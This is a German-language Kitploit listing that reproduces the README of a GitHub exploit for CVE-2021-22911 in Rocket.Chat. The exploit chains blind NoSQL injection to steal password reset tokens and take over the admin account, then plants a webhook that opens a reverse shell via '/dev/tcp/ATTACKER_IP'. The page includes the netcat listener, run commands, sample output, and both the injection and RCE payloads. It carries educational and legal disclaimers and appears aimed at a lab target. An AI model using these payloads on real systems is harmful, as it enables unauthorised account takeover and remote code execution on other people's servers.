Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
rocketcat-cve-2021-22911-exploit — CVE-2021-22911 Rocket.Chat NoSQL Injection RCE Exploit - Bildungszweck | Kitploit
Tools/GitHubGitHub/roshanrajbanshi/rocketcat-cve-2021-22911-exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubroshanrajbanshi/rocketcat-cve-2021-22911-exploit

rocketcat-cve-2021-22911-exploit

CVE-2021-22911 Rocket.Chat NoSQL Injection RCE Exploit - Bildungszweck

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Rocket.Chat CVE-2021-22911 Exploit

⚠️ HAFTUNGSAUSSCHLUSS - NUR ZU BILDUNGSZWECKEN

Dieser Exploit ist ausschließlich für autorisierte Penetrationstests und Bildungszwecke bestimmt. Unbefugter Zugriff auf Computersysteme ist illegal. Der Autor übernimmt keine Haftung für Missbrauch.

📋 Überblick

CVE-2021-22911 ist eine kritische, nicht authentifizierte NoSQL-Injection-Schwachstelle in Rocket.Chat, die zu Remote Code Execution (RCE) führt.

  • CVSS-Score: 9.8 (Kritisch)
  • Betroffene Versionen: Rocket.Chat < 3.12.7
  • Angriffsvektor: Netzwerk / Nicht authentifiziert
  • Auswirkung: Vollständige Systemkompromittierung

🎯 Schwachstellendetails

Dieser Exploit verknüpft drei NoSQL-Injection-Angriffe:

Phase 1: Passwortzurücksetzung eines Benutzers mit niedrigen Berechtigungen

  • Sendet eine Passwortvergessen-Anfrage für einen Benutzer mit niedrigen Berechtigungen
  • Verwendet blinde NoSQL-Injection mit dem $regex-Operator, um das Passwortzurücksetzungs-Token zeichenweise zu extrahieren
  • Setzt das Passwort auf einen bekannten Wert zurück

Phase 2: Admin-Passwortzurücksetzung

  • Wiederholt Phase 1, zielt aber auf das Admin-Konto
  • Extrahiert das Admin-Passwortzurücksetzungs-Token mittels blinder NoSQL-Injection
  • Ändert das Admin-Passwort

Phase 3: Remote Code Execution

  • Authentifiziert sich als das kompromittierte Admin-Konto
  • Erstellt eine Webhook-Integration mit JavaScript-Payload
  • Payload verwendet Node.js child_process.exec(), um eine Reverse Shell zu starten
  • Löst den Webhook aus, um die Reverse Shell auszuführen

🛠️ Voraussetzungen

root@kitploit:~
pip install requests

🚀 Verwendung

1. Netcat-Listener starten (Terminal 1)

root@kitploit:~
nc -lvnp 4444

2. Exploit ausführen (Terminal 2)

Manuelle IP-Eingabe:

root@kitploit:~
python3 rocket_chat_exploit.py \
  -u [email protected] \
  -a [email protected] \
  -t http://chat.rocket.thm \
  -i 10.9.0.1 \
  -p 4444

Automatische Erkennung der tun0-IP (empfohlen):

root@kitploit:~
python3 rocket_chat_exploit.py \
  -u [email protected] \
  -a [email protected] \
  -t http://chat.rocket.thm \
  -i $(ip a show tun0 | grep "inet " | awk '{print $2}' | cut -d/ -f1) \
  -p 4444

Argumente:

  • -u: E-Mail des Benutzers mit niedrigen Berechtigungen (muss existieren)
  • -a: Administrator-E-Mail
  • -t: Ziel-URL (Rocket.Chat-Instanz)
  • -i: Ihre Angreifer-IP (tun0)
  • -p: Netcat-Listener-Port

Beispielausgabe

root@kitploit:~
============================================================
  Rocket.Chat CVE-2021-22911 — RCE
  Target : http://chat.rocket.thm
  Shell  : 10.9.0.1:4444
============================================================

[PHASE 1] Low-priv user → [email protected]
[+] Password reset email sent → [email protected]
[*] Extracting reset token via blind NoSQL injection...
    [43/43] aBcDeFgHiJkLmNoPqRsTuVwXyZ1234567890abcd
[+] Token: aBcDeFgHiJkLmNoPqRsTuVwXyZ1234567890abcd
[+] Password changed to: P@$$w0rd!1234

[PHASE 2] Admin user → [email protected]
[+] Password reset email sent → [email protected]
[*] Extracting reset token via blind NoSQL injection...
    [43/43] XyZ9876543210aBcDeFgHiJkLmNoPqRsTuVwXyZ
[+] Token: XyZ9876543210aBcDeFgHiJkLmNoPqRsTuVwXyZ
[+] Password changed to: P@$$w0rd!1234

[PHASE 3] RCE
[!] Start your listener now:  nc -lvnp 4444
[*] Press Enter when nc is ready...
[+] Authenticated as [email protected]
    userid : userid123456789
    token  : token123456...
[+] Webhook created
    http://chat.rocket.thm/hooks/hookid123/token456
[*] Triggering reverse shell...
[+] Trigger sent — check your nc listener

🔍 Technische Details

NoSQL-Injection-Payload-Format

root@kitploit:~
{
  "message": {
    "msg": "method",
    "method": "getPasswordPolicy",
    "params": [
      {
        "token": {
          "$regex": "^abc"
        }
      }
    ]
  }
}

RCE-Payload (Webhook-Skript)

root@kitploit:~
class Script {
  process_incoming_request({ request }) {
    const require = console.log.constructor('return process.mainModule.require')();
    const { exec } = require('child_process');
    exec('bash -c "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"');
  }
}

📚 Referenzen

  • Original-Exploit: enox - Exploit-DB 50078, 50108
  • Schwachstellenanalyse: SonarSource Blog
  • CVE-Details: CVE-2021-22911

📝 Danksagungen

  • enox - Entwicklung des Original-Exploits
  • SonarSource - Schwachstellenforschung und -analyse

⚖️ Rechtlicher Hinweis

Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt. Unbefugter Zugriff auf Computersysteme ist eine Straftat nach dem Computer Fraud and Abuse Act (CFAA) und ähnlichen internationalen Gesetzen.


Verantwortungsvoll nutzen. Testen Sie nur Systeme, die Sie besitzen oder für die Sie ausdrücklich schriftliche Erlaubnis zum Testen haben.

Tool herunterladen